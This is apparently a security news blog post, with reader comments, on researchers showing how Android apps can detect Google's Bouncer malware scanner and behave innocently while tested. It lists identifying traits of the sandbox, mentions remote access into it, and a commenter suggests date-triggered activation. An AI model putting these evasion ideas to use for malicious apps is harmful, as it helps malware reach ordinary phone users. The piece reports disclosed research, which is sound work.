Two security researchers say that they have found multiple ways to bypass Bouncer, Google’s automated system for detecting malicious Android apps before they are made available in the Google Play store.
Google automatically runs newly uploaded apps through Bouncer before making them available to the general public. Bouncer emulates an Android smartphone, inside a virtual environment, and attempts to tell if the submitted app is capable of stealing data, sending expensive SMS messages, steal information, and so forth.
The challenge for malware authors, therefore, is to see if they can bypass Bouncer’s checks and sneak their malicious Android apps into the Google Play store.
Security researchers Charlie Miller and Jon Oberheide claim to have found multiple ways for Android apps to realise they are being tested by Bouncer and behave differently during the examination. If apps hide their malicious intentions while they are being tested (in other words, tell the difference between running on a real Android phone and running on Bouncer’s virtual environment) they could avoid detection.
With Bouncer subverted, malicious apps could make their way onto Android smartphones belonging to the general public.
Miller and Oberheide discovered a number of tell-tale signs that their app was running on Google Bouncer rather than a real smartphone. For instance, their investigation discovered that Google’s simulations were all registered to the same account (Miles.Karlson@gmail.com), had only one contact in the address book (Michelle.k.levin@gmail.com) and contained a photo of Lady Gaga and an image of a cat.
If, without permission, an app tried to access the address book contact, or steal the Lady Gaga image, Bouncer would know the app being analysed was suspicious.
In a YouTube video published before their talk, Jon Oberheide demonstrates one of the ways in which Bouncer can be bypassed.
In the particular example shown, an app uploaded to the Google Play Android market can tell it is running on Bouncer’s emulated Android device, and remotely give the researchers access – allowing them to learn more and fingerprint the environment.
The concept of malware using smart tricks to determine if it is being analysed or examined in a virtual environment – rather than a potential victim’s real device – is not a new one. For instance, there has been much Windows malware over the years which has incorporated anti-sandboxing, virtual machine detection and anti-debugging tricks to make analysis more difficult.
Miller and Oberheide, who are due to demonstrate their findings at a security conference in New York City today, shared their research in advance with Google, who presumably have taken steps to improve their systems.
There seems little doubt that we will see criminals using similar tricks when attempting to get their malware into the Google Play marketplace in the future. As ever, the battle continues with one side trying to get an advantage over the other.
By the way, if you’re worried about protecting your Android smartphone or tablet against the rising tide of Android malware be sure to check out the free beta of Sophos Mobile Security.
While I love Android this is downright pathetic, Google is one of the biggest companies out there and they don't even bother pushing updates and now 5.0 is around the corner.
so if the app is date activated it wont be detected !! millions could be installed and activated after a particular date ? or is it to easy ?
Not really. The app must acquire the permissions it needs at installation time and that's what would give it away.
Umm, it's a fundamental principle of computer science that you cannot tell by examination whether a program will "finish" or will run forever. By extension, you also cannot tell whether if will behave maliciously. No matter how long you run it in the simulated environment, there's that chance that it will act badly if you just ran it a little longer.
Such attempts at programmatically checking an app are doomed.
"Had we but world enough, and time,"…
That "fundamental principle of computer science" is a theoretical result for an abstract computer with infinite time and memory. A smartphone, however, is a finite state machine. Therefore it *could* actually be possible for a supercomputer to evaluate every possible state reachable from the program in question. However, this is again a theoretical rather than practical assertion. The sun would explode long before any of todays supercomputers could finish the computation.
Thus Turing's halting problem is actually irrelevant here (and in most other places where it is quoted to make similar assertions.) Let's instead stick with pragmatic facts: It is true that no program can, in reasonable time and available memory, 100% evaluate all possible behaviours of another application. However, that does not mean that "attempts at programmatically checking an app are doomed" There are techniques that can be used to predict and investiagte the most likely / suspicious behaviour. In the end it comes down to a war of minds and technology between malware authors and security researches. Yes people will exploit the now exposed weaknesses in Bouncer, but hopefully Google will respond by making a few changes and improvements.
…er, this is a minor point and not relevant to your otherwise worthy response, but for the record, the sun will NEVER explode. It doesn't have enough mass to create a supernova. Rather, it will expand into a red giant whose radius will most likely exceed the average radius of the Earth's orbit, long before which the human species will have become toast if it hasn't moved elsewhere by then…which will be roughly 5 billion years from now. Eventually, that expansion will cool the sun to the point wherein it can no longer generate enough radiation pressure to maintain such a large volume, and it will collapse to a white dwarf and eventually burn itself out.
Your point that Turing's halting problem is an irrelevant constraint for the PRACTICAL purposes of checking apps for malware is well taken, though.